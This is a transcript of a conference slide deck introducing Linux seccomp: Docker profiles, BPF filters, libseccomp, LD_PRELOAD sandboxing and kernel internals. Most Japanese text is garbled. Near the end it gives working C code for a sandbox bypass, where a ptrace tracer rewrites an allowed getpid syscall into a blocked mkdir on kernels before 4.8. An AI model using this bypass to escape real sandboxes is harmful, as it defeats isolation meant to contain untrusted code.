Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Introduction to Seccomp

mrtc0
April 17, 2021

Introduction to Seccomp

2021.04.17 第14回 コンテナ技術の情報交換会@オンライン
https://ct-study.connpass.com/event/205571/

mrtc0

April 17, 2021
Tweet

More Decks by mrtc0

Other Decks in Programming

Transcript

  1. 4FDDPNQͱ͸ 4FDDPNQͷྺ࢙  -JOVY,FSOFMʹϚʔδ͞ΕΔɻ ౰࣌͸read, write, exit, sigreturn ͷΈ͔࣮͠ߦͰ͖ͳ͍ɻ QSPDQJETFDDPNQͰ੍ޚɻ

     -JOVY,FSOFMͰprctl()ܦ༝ Ͱ੍ޚͰ͖ΔΑ͏ʹͳΔɻ  -JOVY,FSOFMʹ4FDDPNQ .PEF ͕ొ৔ɻ ೚ҙͷγεςϜίʔϧΛ੍ݶͰ͖ɺ #1'ΛϕʔεʹϑΟϧλͰ͖Δɻ  -JOVY,FSOFMͰseccomp(2) ͕௥Ճɻ TFDDPNQCQGͱ͔TFDDPNQͱ͔දه༳Ε͕ଟ͍ 4FDDPNQ/PUJGZ ͕௥Ճɻ Ϣʔβʔεϖʔεͱ࿈ܞ͕औΕ ΔΑ͏ʹɻ  ਖ਼໊ࣜশͰ͸ͳ͍ɻ4FDDPNQUSBQUPVTFSTQBDFͳͲͱ΋ݺ͹ΕΔ ݸਓతʹେ͖͍࠷ۙͷมߋΛϐοΫΞοϓ͍ͯ͠·͢ɻ
  2. 4FDDPNQ͕Ͳ͏ಈ͔͘ ɾγεςϜίʔϧ͕ݺ͹ΕΔͨͼʹ4FDDPNQ͕ݕࠪΛߦ͏ ɾ4FDDPNQͷϑΟϧλ͸ࢠϓϩηεʹ΋Ҿ͖ܧ͕ΕΔ Process read(2)Λݺͼग़͠ Seccomp 👮read(2)Ϥγο ໭Γ஋Λฦ͢ $BMMread(2) Process

    execve(2)Λݺͼग़͠ Seccomp 👮execve(2)ΞΧϯ execve(2)͸࣮ߦ͞Εͳ͍ SIGSYSͳΓܾΊΒΕͨ ΞΫγϣϯ͕࣮ߦ͞ΕΔ ΞΫγϣϯʹΑͬͯ͸࣮ߦ͞ΕΔέʔε΋͋Δ 6TFSTQBDF ,FSOFMTQBDF ɾෆਖ਼ͳ৔߹͸ܾΊΒΕͨΞΫγϣϯ͕࣮ߦ͞ΕΔ ɾҰൠతʹɺγεςϜίʔϧ͕ࢭΊΒΕͯSIGSYS͕ฦΔ
  3. 4FDDPNQ&YBNQMFT 4FDDPNQJO%PDLFS 4FDDPNQͷಈ͖Λମݧ͢Δʹ͸%PDLFS͕खܰ $ cat seccomp.json { "defaultAction": "SCMP_ACT_ALLOW", //

    શͯͷγεςϜίʔϧΛڐՄ "syscalls": [ { "name": "mkdir", "action": "SCMP_ACT_ERRNO" // mkdir(2) Λېࢭ } ] } $ docker run --rm -it --security-opt seccomp=seccomp.json ubuntu:20.04 bash root@ab9ad7d57f7f:/# mkdir /tmp/test mkdir: cannot create directory '/tmp/test': Operation not permitted
  4. 4FDDPNQ&YBNQMFT NBOTFDDPNQ int seccomp(unsigned int operation, unsigned int flags, void

    *args); ϓϩηεͰTFDDPNQΛར༻͢Δʹ͸seccomp(2)Λ࢖͏ operation͸࣍ͷ஋ΛऔΔ SECCOMP_SET_MODE_STRICT ... read(2), write(2), _exit(2), sigreturn(2) ͷΈΛڐՄ͢Δɻ SECCOMP_SET_MODE_FILTER ... BPF ͰϑΟϧλΛॻ͍ͯ೚ҙͷγεςϜίʔϧͱͦͷҾ਺Λ੍ݶͰ͖Δɻ
  5. #include <stdio.h> #include <sys/utsname.h> int main(void) { struct utsname name;

    if (uname(&name)) { perror("uname failed: "); return 1; } printf("uname: %s\n", name.sysname); return 0; } αϯϓϧͱͯ͠uname(2)Λېࢭ͢ΔϓϩάϥϜΛ࡞Γ·͢ɻ TFDDPNQ   TBOECPYԽ͢ΔίʔυΛ༻ҙ  TFDDPNQ  Λ࣮ߦ͢Δؔ਺Λ༻ҙ  #1'ϑΟϧλΛఆٛ  TFDDPNQ  Λద༻ $ ./uname => Linux
  6. ... sandbox() // ௥Ճ if (uname(&name)) { perror("uname failed: ");

    return 1; } ... TFDDPNQΛద༻͍ͨ͠ॲཧͷલʹɺ seccomp(2)Λ࣮ߦ͢ΔTBOECPY ؔ਺Λ௥Ճ  TBOECPYԽ͢ΔίʔυΛ༻ҙ  TFDDPNQ  Λ࣮ߦ͢Δؔ਺Λ༻ҙ  #1'ϑΟϧλΛఆٛ  TFDDPNQ  Λద༻ TFDDPNQ 
  7. // seccomp BPF ϑΟϧλͷఆٛ struct sock_filter filter[] = { //

    1. seccomp_data ߏ଄ମ͔Β arch ϑΟʔϧυͷ஋Λϩʔυ // γεςϜίʔϧ͸ΞʔΩςΫνϟʹΑͬͯ࠾൪͕ҟͳΔͨΊɺ // ඞͣνΣοΫ͢Δඞཁ͕͋Δɻ BPF_STMT(BPF_LD | BPF_W | BPF_ABS, (offsetof(struct seccomp_data, arch))), // 2. x86_64 Ҏ֎ͷ৔߹͸ SECCOMP_RET_KILL BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, AUDIT_ARCH_X86_64, 0, 4), // 3. seccomp_data ߏ଄ମ͔Β nr ϑΟʔϧυͷ஋Λϩʔυ // ͜͜ʹ͸γεςϜίʔϧ൪߸͕֨ೲ͞Ε͍ͯΔ BPF_STMT(BPF_LD | BPF_W | BPF_ABS, (offsetof(struct seccomp_data, nr))), // 4. uname(2) Ͱ͋Ε͹ SECCOMP_RET_ERRNO ͰEPERM Λฦ͢ // ͦΕҎ֎ͷ৔߹͸ڐՄ BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, SYS_uname, 0, 1), BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ERRNO | (EPERM & SECCOMP_RET_DATA)), BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW), BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL), };  TBOECPYԽ͢ΔίʔυΛ༻ҙ  TFDDPNQ  Λ࣮ߦ͢Δؔ਺Λ༻ҙ  #1'ϑΟϧλΛఆٛ  TFDDPNQ  Λద༻ TFDDPNQ 
  8. struct sock_fprog prog = { .len = (unsigned short) (sizeof(filter)

    / sizeof(filter[0])), .filter = filter, }; // SECCOMP_SET_MODE_FILTER Λར༻͢Δʹ͸ CAP_SYS_ADMIN ͔ // εϨουʹ no_new_privs ͕ඞཁͳͷͰηοτ if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0)) { perror("PR_SET_NO_NEW_PRIVS failed"); exit(1); }; // seccomp γεςϜίʔϧͷݺͼग़͠ if (syscall(SYS_seccomp, SECCOMP_SET_MODE_FILTER, 0, &prog)) { perror("seccomp failed"); exit(1); };  TBOECPYԽ͢ΔίʔυΛ༻ҙ  TFDDPNQ  Λ࣮ߦ͢Δؔ਺Λ༻ҙ  #1'ϑΟϧλΛఆٛ  TFDDPNQ  Λద༻ TFDDPNQ  $ ./uname_with_seccomp uname failed: Operation not permitted
  9. 4FDDPNQ&YBNQMFT 3FBEJOH#1' Ͱ͸#1'ͱ͸Ͳ͏͍ͬͨ΋ͷͳͷ͔ݟͯΈ·͠ΐ͏ɻ UDQEVNQͰA-dAΦϓγϣϯΛ࢖͏ͱ#1'ͷόΠτίʔυ΍໋ྩΛදࣔͰ͖·͢ɻ $ sudo tcpdump -d icmp (000)

    ldh [12] // ύέοτઌ಄͔Β 12byte ໨Λϩʔυ (001) jeq #0x800 jt 2 jf 5 // ಡΈࠐΜͩ஋͕ 0x800 Ͱ͋Ε͹ 2 ΁ (002) ldb [23] // 23byte ໨ (003) jeq #0x1 jt 4 jf 5 // ಡΈࠐΜͩ஋͕ 0x1 Ͱ͋Ε͹ 4 ΁ (004) ret #262144 (005) ret #0
  10. 4FDDPNQ&YBNQMFT $ sudo tcpdump -d icmp (000) ldh [12] //

    ύέοτઌ಄͔Β 12byte ϩʔυ (001) jeq #0x800 jt 2 jf 5 // ಡΈࠐΜͩ஋͕ 0x800 Ͱ͋Ε͹ 2 ΁ (002) ldb [23] // 23byte໨ (003) jeq #0x1 jt 4 jf 5 // ಡΈࠐΜͩ஋͕ 0x1 Ͱ͋Ε͹ 4 ΁ (004) ret #262144 (005) ret #0 Ͱ͸#1'ͱ͸Ͳ͏͍ͬͨ΋ͷͳͷ͔ݟͯΈ·͠ΐ͏ɻ UDQEVNQͰA-dAΦϓγϣϯΛ࢖͏ͱ#1'ͷόΠτίʔυ΍໋ྩΛදࣔͰ͖·͢ɻ 3FBEJOH#1'
  11. 4FDDPNQ&YBNQMFT 3FBEJOH#1' ໋ྩηοτʹ͍ͭͯ͸%PDVNFOUBUJPOOFUXPSLJOHpMUFSUYUʹଘࡏ͢Δɻ ྫ͑͹ઌఔͷuname(2)Ͱఆٛͨ͠ϑΟϧλΛಡΈղ͘ͱ࣍ͷΑ͏ʹͳΔɻ BPF_STMT(BPF_LD | BPF_W | BPF_ABS, (offsetof(struct

    seccomp_data, arch))), LD* ͸A(ΞΩϡϜϨʔλ)Ϩδελʹϩʔυ BPF_W ͸αΠζम০ࢠͰ Word Size (4byte) Λࣔ͢ BPF_ABS ͸ mode म০ࢠͰઈରࢀরΛࣔ͢ ΑͬͯɺA = P[k:4] Ͱ arch ΛϨδελʹϩʔυͱ͍͏ҙຯ BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, AUDIT_ARCH_X86_64, 0, 4), JEQ ͸ dst == src Λҙຯ͢Δ BPF_K ͸ଈ஋Λࣔ͢ ΑͬͯɺA == AUDIT_ARCH_X86_64 ? 0 : 4 ͱͳΔ
  12. MJCTFDDPNQ ɾ4FDDPNQͷϑΟϧλΛ؆୯ʹॻͨ͘ΊͷΠϯλʔϑΣΠεΛఏڙ͢ΔϥΠϒϥϦ ɾΞʔΩςΫνϟͷࠩҟΛٵऩͯ͘͠ΕΔ Y "3. .*14 FUD  ɾNBOʹ΋MJCTFDDPNQΛར༻ͯ͠ϑΟϧλΛॻ͘͜ͱ͕קΊΒΕ͍ͯΔ TFDDPNQMJCTFDDPNQ

    > Rather than hand-coding seccomp filters as shown in the example > below, you may prefer to employ the libseccomp library, which > provides a front-end for generating seccomp filters. IUUQTNBOPSHMJOVYNBOQBHFTNBOTFDDPNQIUNM
  13. MJCTFDDPNQ ɾઌఔͷuname(2)ͷ੍ݶΛߦ͏TBOECPY ͸࣍ͷΑ͏ʹॻ͖௚͢͜ͱ͕Ͱ͖Δ TFDDPNQMJCTFDDPNQ // શγεςϜίʔϧݺͼग़͠ΛڐՄ scmp_filter_ctx seccomp_ctx = seccomp_init(SCMP_ACT_ALLOW);

    if (!seccomp_ctx) err(1, "seccomp_init failed"); // uname γεςϜίʔϧͰ͋Ε͹ Kill if (seccomp_rule_add_exact(seccomp_ctx, SCMP_ACT_KILL, seccomp_syscall_resolve_name("uname"), 0)) { perror("seccomp_rule_add_exact failed"); exit(1); } // ϑΟϧλΛద༻ if (seccomp_load(seccomp_ctx)) { perror("seccomp_load failed"); exit(1); } seccomp_release(seccomp_ctx);
  14. ϓϩηεͷऴྃͷ࢓ํ MJCTFDDPNQͷར༻ͷ༗ແͰϓϩηεͷऴྃͷ࢓ํ͕ҟͳΔ͜ͱʹؾ͍ͮͨͰ͠ΐ͏͔ $ ./uname_with_seccomp uname failed: Operation not permitted 👈

    $ ./uname_with_libseccomp Bad system call (core dumped) 👈 BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, SYS_uname, 0, 1), BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ERRNO | (EPERM & SECCOMP_RET_DATA)), $ sudo strace ./uname_with_libseccomp ... uname( <unfinished ...>) = ? +++ killed by SIGSYS (core dumped) +++ Bad system call લऀ͸&1&3.Ληοτͯ͠ɺࣗ਎ͰΤϥʔϋϯυϦϯάΛ͍ͯ͠·ͨ͠ɻ ҰํͰɺMJCTFDDPNQଆͰ͸4*(4:4Ͱऴ͍ྃͯ͠·͢ɻ
  15. ϓϩηεͷऴྃͷ࢓ํ ΤϥʔϋϯυϦϯάΛࣗ෼Ͱߦ͑ͨํ͕ॊೈͰ͕͢ɺ࣍ͷΑ͏ͳέʔε΋ߟ͑ΒΕ·͢ ... sandbox(); // read(2) Λېࢭ // ΋͠ read(2)

    ʹࣦഊͯ͠΋ pread(2) ͰόΠύε͢Δ size = read(fd, buf, sizeof(buf)); if (size == -1) { perror("read(2) failed "); size = pread(fd, buf, sizeof(buf), 0); if (size == -1) { perror("pread(2) failed "); ... ׬શͳϑΟϧλΛ༻ҙ͢Δͷ͸೉͍͠ SIGSYSͰଈ࠲ʹऴྃ͢Δ͜ͱͰ߈ܸऀʹόΠύεͷ༨஍Λ༩͑ͳ͍ͱ͍͏ϝϦοτ͕͋Δ
  16. -%@13&-0"% ($$֦ு__attribute__((constructor))Ͱ4FDDPNQΛηοτ͢Δ /* seccomp.c */ #include <stdio.h> #include <seccomp.h> __attribute__((constructor))

    void configure_seccomp(void) { ... if (seccomp_rule_add_exact(seccomp_ctx, SCMP_ACT_KILL, seccomp_syscall_resolve_name("uname"), 0)) { perror("seccomp_rule_add_exact failed"); } ... printf("Configuring seccomp\n"); ... } $ gcc -shared -fPIC -o seccomp.so seccomp.c -lseccomp $ env LD_PRELOAD=./seccomp.so uname -a Configuring seccomp fish: “env LD_PRELOAD=./seccomp.so una…” terminated by signal SIGSYS (Bad system call) ͨͩ͠-%@13&-0"%Λ࢖͏৔߹ɺ੩తϦϯΫ͞ΕͨϑΝΠϧͰ͸ػೳ͠ͳ͍ $ gcc uname.c -static -o uname-static $ env LD_PRELOAD=./seccomp.so./uname-static uname: Linux
  17. DMPVEGMBSFTBOECPY ઌఔͷ-%@13&-0"%Λ࢖͏ํ๏ΛɺΑΓ൚༻తʹ࢖͑ΔΑ͏ʹͨ͠΋ͷ ؀ڥม਺ʹڐՄ ېࢭ͢ΔγεςϜίʔϧΛࢦఆ͢Δ͜ͱͰػೳ͢Δ $ env LD_PRELOAD=./libsandbox.so SECCOMP_SYSCALL_DENY="uname" uname -a

    initializing seccomp with default action (allow) adding uname to the process seccomp filter (kill process) fish: 'env LD_PRELOAD=./libsandbox.so…' terminated by signal SIGSYS (Bad system call) IUUQTHJUIVCDPNDMPVEqBSFTBOECPY ੩తϦϯΫͨ͠ϑΝΠϧ΁ͷରԠͱͯ͠TBOECPYJGZͱ͍͏πʔϧΛఏڙ͍ͯ͠Δ GPSL  FYFD ͢Δ͚ͩͷ΋ͷ # env SECCOMP_SYSCALL_DENY="uname" ./sandboxify ./uname-static initializing seccomp with default action (allow) adding uname to the process seccomp filter (kill process) fish: 'sudo env SECCOMP_SYSCALL_DENY="…' terminated by signal SIGSYS (Bad system call) TBOECPYJGZͱಉ༷ͷΞϓϩʔν͸TZTUFNEͰ΋Մೳ [Service] ExecStart = /path/to/uname SystemCallFilter = openat uname brk arch_prctl readlink access fstat write exit_group mmap close read mprotect munmap
  18. -%@13&-0"%WTTBOECPYJGZ TBOECPYJGZͷΑ͏ͳΞϓϩʔνͷ৔߹ɺϙϦγʔ͕ΏΔ͘ͳͬͯ͠·͏Մೳੑ͕͋Δɻ $ strace ./uname-static execve("/home/ubuntu/seccomp/uname-static", ["/home/ubuntu/secco... brk(NULL) = 0xba2000

    brk(0xba31c0) = 0xba31c0 arch_prctl(ARCH_SET_FS, 0xba2880) = 0 uname({sysname="Linux", nodename="sandbox", ...}) = 0 readlink("/proc/self/exe", "/home/ubuntu/seccomp/uname-stati"..., 4096) = 33 brk(0xbc41c0) = 0xbc41c0 brk(0xbc5000) = 0xbc5000 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory) uname({sysname="Linux", nodename="sandbox", ...}) = 0 fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 2), ...}) = 0 write(1, "Linux\n", 6Linux -%@13&-0"%Λ࢖ͬͨΞϓϩʔνͰ͸ɺ͍ΘΏΔNBJO ͷલʹద༻͞ΕΔ͕ɺTBOECPYJGZͷΑ͏ͳΞϓϩʔ νͩͱϥϯλΠϜͷॳظԽͰ࣮ߦ͞ΕΔγεςϜίʔϧ΋ڐ༰͢Δඞཁ͕͋Δɻ IUUQTCMPHDMPVEqBSFDPNTBOECPYJOHJOMJOVYXJUI[FSPMJOFTPGDPEF
  19. %PDLFS ίϯςφͰಈ͔͢ΞϓϦέʔγϣϯʹରͯ͠TFDDPNQΛઃఆՄೳ $ cat seccomp.json { "defaultAction": "SCMP_ACT_ALLOW", // શͯͷγεςϜίʔϧΛڐՄ

    "syscalls": [ { "name": "mkdir", "action": "SCMP_ACT_ERRNO" // mkdir(2) Λېࢭ } ] } $ docker run --rm -it --security-opt seccomp=seccomp.json ubuntu:20.04 bash root@ab9ad7d57f7f:/# mkdir /tmp/test mkdir: cannot create directory '/tmp/test': Operation not permitted -9%ͳͲଞͷଟ͘ͷίϯςφϥϯλΠϜ΋4FDDPNQ͸αϙʔτ͍ͯ͠·͢
  20. 4&$$0.1@3&5@-0(4$.1@"$5@-0( -JOVY,FSOFMҎ߱Ͱ͸SECCOMP_RET_LOG"DUJPOͰBVEJUEʹϩάΛग़ྗͰ͖Δ struct sock_filter filter[] = { BPF_STMT(BPF_LD | BPF_W

    | BPF_ABS, (offsetof(struct seccomp_data, arch))), BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, AUDIT_ARCH_X86_64, 0, 2), BPF_STMT(BPF_LD | BPF_W | BPF_ABS, (offsetof(struct seccomp_data, nr))), BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_LOG), BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL), } // libseccomp scmp_filter_ctx seccomp_ctx = seccomp_init(SCMP_ACT_LOG); if (!seccomp_ctx) err(1, "seccomp_init failed"); if (seccomp_load(seccomp_ctx)) { perror("seccomp_load failed"); exit(1); } $ tail -f /var/log/audit/audit.log type=SECCOMP msg=audit(1618574663.331:1719): ... comm="a.out" exe="/home/ubuntu/seccomp/logging/a.out" sig=0 arch=c000003e syscall=39 ... type=SECCOMP msg=audit(1618574663.331:1720): ... comm="a.out" exe="/home/ubuntu/seccomp/logging/a.out" sig=0 arch=c000003e syscall=63 ... type=SECCOMP msg=audit(1618574663.331:1721): ... comm="a.out" exe="/home/ubuntu/seccomp/logging/a.out" sig=0 arch=c000003e syscall=5 ... type=SECCOMP msg=audit(1618574663.331:1722): ... comm="a.out" exe="/home/ubuntu/seccomp/logging/a.out" sig=0 arch=c000003e syscall=1 ... type=SECCOMP msg=audit(1618574663.331:1723): ...comm="a.out" exe="/home/ubuntu/seccomp/logging/a.out" sig=0 arch=c000003e syscall=231 ...
  21. F#1' ɾF#1'Λ࢖ͬͯγεςϜίʔϧݺͼग़͠ΛτϨʔε͠ɺϓϩϑΝΠϧΛ࡞੒͢Δ # ./execsnoop PCOMM PID RET ARGS bash 15887

    0 /usr/bin/man ls preconv 15894 0 /usr/bin/preconv -e UTF-8 man 15896 0 /usr/bin/tbl man 15897 0 /usr/bin/nroff -mandoc -rLL=169n -rLT=169n -Tutf8 man 15898 0 /usr/bin/pager -s nroff 15900 0 /usr/bin/locale charmap nroff 15901 0 /usr/bin/groff -mtty-char -Tutf8 -mandoc -rLL=169n -rLT=169n groff 15902 0 /usr/bin/troff -mtty-char -mandoc -rLL=169n -rLT=169n -Tutf8 groff 15903 0 /usr/bin/grotty ɾFYUFOEFE#1'ͷུɻΧʔωϧτϨʔγϯάͷͨΊͷٕज़ɻ ɾৄ͘͠͸4PGUXBSF%FTJHO೥d݄߸Λ
  22. 0$*TFDDPNQCQGIPPL $ sudo podman run --annotation io.containers.trace-syscall=of:/tmp/uname.json ubuntu:latest uname $

    cat /tmp/ls.json | jq { "defaultAction": "SCMP_ACT_ERRNO", "architectures": [ "SCMP_ARCH_X86_64" ], "syscalls": [ { "names": [ "access", "arch_prctl", "brk", "capset", "close", "execve", "exit_group" ... 0$*SVOUJNFIPPLTͷQSFTUBSU0$*IPPL Λར༻ͯ͠ɺίϯςφͷJOJUϓϩηε͕։࢝͢Δ௚લ͔Β F#1'ϓϩάϥϜΛ࢖ͬͯτϨʔε͢Δɻ IUUQTHJUIVCDPNPQFODPOUBJOFSTSVOUJNFTQFDCMPCNBTUFSDPOpHNEQSFTUBSU IUUQTHJUIVCDPNDPOUBJOFSTPDJTFDDPNQCQGIPPL
  23. EPDLFSTMJN ubuntu@sandbox ~> docker-slim build ubuntu:latest --http-probe=false ... cmd=build info=results

    status='MINIFIED' by='19.62X' size.original='73 MB' size.optimized='3.7 MB' cmd=build info=results image.name='ubuntu.slim' image.size='3.7 MB' has.data='true' cmd=build info=results artifacts.location='/tmp/docker-slim-state/.docker-slim-state/images/.../artifacts' cmd=build info=results artifacts.report='creport.json' cmd=build info=results artifacts.dockerfile.reversed='Dockerfile.fat' cmd=build info=results artifacts.dockerfile.optimized='Dockerfile' cmd=build info=results artifacts.seccomp='ubuntu-seccomp.json' cmd=build info=results artifacts.apparmor='ubuntu-apparmor-profile' ubuntu@sandbox ~> cat /tmp/docker-slim-state/.docker-slim-state/images/.../artifacts/ubuntu-seccomp.json { "defaultAction": "SCMP_ACT_ERRNO", "architectures": [ "SCMP_ARCH_X86_64" ], "syscalls": [ { "names": [ "uname", "chdir", "execve", "read", ... ptrace(2)Λۦ࢖ͯ͠"QQ"SNPS΍4FDDPNQͷϓϩϑΝΠϧΛੜ੒ͯ͘͠ΕΔπʔϧ IUUQTHJUIVCDPNEPDLFSTMJNEPDLFSTMJN
  24. <࠶ܝ>4FDDPNQ͕Ͳ͏ಈ͔͘ ɾγεςϜίʔϧ͕ݺ͹ΕΔͨͼʹ4FDDPNQ͕ݕࠪΛߦ͏ ɾෆਖ਼ͳ৔߹͸ܾΊΒΕͨΞΫγϣϯ͕࣮ߦ͞ΕΔ ɾҰൠతʹɺγεςϜίʔϧ͕ࢭΊΒΕͯ4*(4:4͕ฦΔ Process SFBE  Λݺͼग़͠ Seccomp 👮SFBE

     Ϥγο ໭Γ஋Λฦ͢ $BMMSFBE  Process FYFDWF  Λݺͼग़͠ Seccomp 👮FYFDWF  ΞΧϯ FYFDWF  ͸࣮ߦ͞Εͳ͍ 4*(4:4ͳΓܾΊΒΕͨ ΞΫγϣϯ͕࣮ߦ͞ΕΔ ΞΫγϣϯʹΑͬͯ͸࣮ߦ͞ΕΔέʔε΋͋Δ 6TFSTQBDF ,FSOFMTQBDF
  25. 4FDDPNQͷॲཧΛ௥͍͔͚Δ ͪΌΜͱγεςϜίʔϧݺͼग़͠௚લʹɺ ࣮ߦ͞Ε͍ͯΔ γεςϜίʔϧͷ؂ࠪ /* * Returns the syscall nr

    to run (which should match regs->orig_ax) or -1 * to skip the syscall. */ static long syscall_trace_enter(struct pt_regs *regs) { u32 arch = in_ia32_syscall() ? AUDIT_ARCH_I386 : AUDIT_ARCH_X86_64; ... if (work & _TIF_SECCOMP) { struct seccomp_data sd; sd.arch = arch; sd.nr = regs->orig_ax; sd.instruction_pointer = regs->ip; ... ret = __secure_computing(&sd); if (ret == -1) return ret; do_syscall_64() -> syscall_trance_enter() -> __secure_computing()
  26. 4FDDPNQͷॲཧΛ௥͍͔͚Δ ͪ͜Β΋.PEFͰॲཧΛ෼ذɻ int __secure_computing(const struct seccomp_data *sd) { int mode

    = current->seccomp.mode; int this_syscall; if (IS_ENABLED(CONFIG_CHECKPOINT_RESTORE) && unlikely(current->ptrace & PT_SUSPEND_SECCOMP)) return 0; this_syscall = sd ? sd->nr : syscall_get_nr(current, task_pt_regs(current)); switch (mode) { case SECCOMP_MODE_STRICT: __secure_computing_strict(this_syscall); /* may call do_exit */ return 0; case SECCOMP_MODE_FILTER: return __seccomp_filter(this_syscall, sd, false); default: BUG(); } } γεςϜίʔϧͷ؂ࠪ __seccomp_filter() -> seccomp_run_filters() -> BPF_PROG_RUN() ධՁޙͷ໭Γ஋ͱͳΔ"DUJPOͰ෼ذ filter_ret = seccomp_run_filters(sd, &match); data = filter_ret & SECCOMP_RET_DATA; action = filter_ret & SECCOMP_RET_ACTION_FULL; switch (action) { case SECCOMP_RET_ERRNO: /* Set low-order bits as an errno, capped at MAX_ERRNO. */ if (data > MAX_ERRNO) data = MAX_ERRNO; syscall_set_return_value(current, task_pt_regs(current), -data, 0); goto skip; case SECCOMP_RET_TRAP: ...
  27. .VTUOPUBMMPXVTFPGQUSBDF  NBOTFDDPNQ Before kernel 4.8, the seccomp check will

    not be run again after the tracer is notified. (This means that, on older kernels, seccomp-based sandboxes must not allow use of ptrace(2)—even of other sandboxed processes—without extreme care; ptracers can use this mechanism to escape from the seccomp sandbox.)
  28. %PTFDDPNQBGUFSQUSBDF 4FDDPNQͷίʔυΛಡΉͱ࣍ͷΑ͏ͳίϝϯτ͕͋Γ·͢ static long syscall_trace_enter(struct pt_regs *regs) { u32 arch

    = in_ia32_syscall() ? AUDIT_ARCH_I386 : AUDIT_ARCH_X86_64; struct thread_info *ti = current_thread_info(); unsigned long ret = 0; bool emulated = false; u32 work; ... /* * Do seccomp after ptrace, to catch any tracer changes. */ if (work & _TIF_SECCOMP) { struct seccomp_data sd; sd.arch = arch; sd.nr = regs->orig_ax; sd.instruction_pointer = regs->ip;
  29. ݺͼग़͠ͷҧ͍ -JOVY,FSOFMͰ͸࣍ͷΑ͏ͳݺͼग़͕͠͞Ε͍ͯΔ // in Linux Kernel 4.7 long syscall_trace_enter(struct pt_regs

    *regs) { u32 arch = in_ia32_syscall() ? AUDIT_ARCH_I386 : AUDIT_ARCH_X86_64; unsigned long phase1_result = syscall_trace_enter_phase1(regs, arch); if (phase1_result == 0) return regs->orig_ax; else return syscall_trace_enter_phase2(regs, arch, phase1_result); } unsigned long syscall_trace_enter_phase1(struct pt_regs *regs, u32 arch) { ... if (IS_ENABLED(CONFIG_DEBUG_ENTRY)) BUG_ON(regs != task_pt_regs(current)); work = ACCESS_ONCE(ti->flags) & _TIF_WORK_SYSCALL_ENTRY; /* * Do seccomp first -- it should minimize exposure of other * code, and keeping seccomp fast is probably more valuable * than the rest of this. */ if (work & _TIF_SECCOMP) { struct seccomp_data sd; ret = seccomp_phase1(&sd); if (ret == SECCOMP_PHASE1_SKIP) { regs->orig_ax = -1; ret = 0; } else if (ret != SECCOMP_PHASE1_OK) { return ret; /* Go directly to phase 2 */ } work &= ~_TIF_SECCOMP; } ... /* Do our best to finish without phase 2. */ if (work == 0) return ret; /* seccomp and/or nohz only (ret == 0 here) */ syscall_trace_enter() -> syscall_trace_enter_phase1() -> seccomp_phase1() -JOVY,FSOFMҎ߱Ͱ͸ tracehook_report_syscall_entry()Ͱ5SBDFSʹ௨஌͍ͯ͠Δ // in Linux Kernel 4.8 static long syscall_trace_enter(struct pt_regs *regs) { ... if (IS_ENABLED(CONFIG_DEBUG_ENTRY)) BUG_ON(regs != task_pt_regs(current)); ... if ((emulated || (work & _TIF_SYSCALL_TRACE)) && tracehook_report_syscall_entry(regs)) return -1L; ... /* * Do seccomp after ptrace, to catch any tracer changes. */ if (work & _TIF_SECCOMP) { struct seccomp_data sd;
  30. #ZQBTT4FDDPNQ mkdirΛېࢭͨ͠%PDLFSίϯςφͰmkdirΛ࣮ߦ͠·͢ void attack() { int rc; // mkdir("dir", 0777);

    // Ҿ਺෦෼ʹ SYS_mkdir ͱͦͷҾ਺Λ༩͓͑ͯ͘ syscall(SYS_getpid, SYS_mkdir, "dir", 0777); } int main() { ... switch( (pid = fork()) ) { case -1: die("Failed fork"); case 0: ptrace(PTRACE_TRACEME, 0, NULL, NULL); kill(getpid(), SIGSTOP); attack(); return 0; } waitpid(pid, 0, 0); ...  forkͯ͠ࢠϓϩηεΛτϨʔε  ࢠϓϩηεͰ͸ڐՄ͞Ε͍ͯΔTZTDBMM getpid ΛݺͿ ͜ͷͱ͖ɺϨδελௐ੔ͷͨΊʹmkdirͱͦͷҾ਺Λ༩͑Δ
  31. #ZQBTT4FDDPNQ ਌ϓϩηε τϨʔαʔ ଆͰϨδελΛมߋ͢Δ ptrace(PTRACE_SYSCALL, pid, NULL, NULL); if (waitpid(pid,

    &st, __WALL) == -1) { break; } if (!(WIFSTOPPED(st) && WSTOPSIG(st) == SIGTRAP)) { break; } ptrace(PTRACE_GETREGS, pid, NULL, &regs); printf("orig_rax = %lld\n", regs.orig_rax); if (regs.rax != -ENOSYS) { continue; } if (regs.orig_rax == SYS_getpid) { regs.orig_rax = regs.rdi; regs.rdi = regs.rsi; regs.rsi = regs.rdx; regs.rdx = regs.r10; regs.r10 = regs.r8; regs.r8 = regs.r9; regs.r9 = 0; ptrace(PTRACE_SETREGS, pid, NULL, &regs); }  ࢠϓϩηεΛ࠶։ͯ͠γεςϜίʔϧݺͼग़͠ͷλΠϛϯάͰ ϨδελΛऔಘ  Ϩδελͷorgi_raxʹ͸γεςϜίʔϧ൪߸͕ೖ͍ͬͯΔͷ ͰɺͦΕ͕getpidͰ͋Ε͹mkdirʹมߋ͢Δ getpidݺͼग़࣌͠ʹmkdirͱͦͷҾ਺ΛؚΊ͍ͯͨͷ ͰɺͣΒ͚ͩ͢
  32. ࢀߟࢿྉ  IUUQTXXXLFSOFMPSHEPDIUNMWVTFSTQBDFBQJTFDDPNQ@pMUFSIUNM  IUUQTNBOPSHMJOVYNBOQBHFTNBOTFDDPNQIUNM  IUUQTFMJYJSCPPUMJODPNMJOVYMBUFTUTPVSDFLFSOFMTFDDPNQD  IUUQTMXOOFU"SUJDMFT 

    IUUQTCMPHDMPVEqBSFDPNTBOECPYJOHJOMJOVYXJUI[FSPMJOFTPGDPEF  IUUQTNNJIBUFOBCMPHDPNFOUSZ  IUUQTBKYDIBQNBOHJUIVCJPMJOVYTFDDPNQBOETFDDPNQCQGIUNM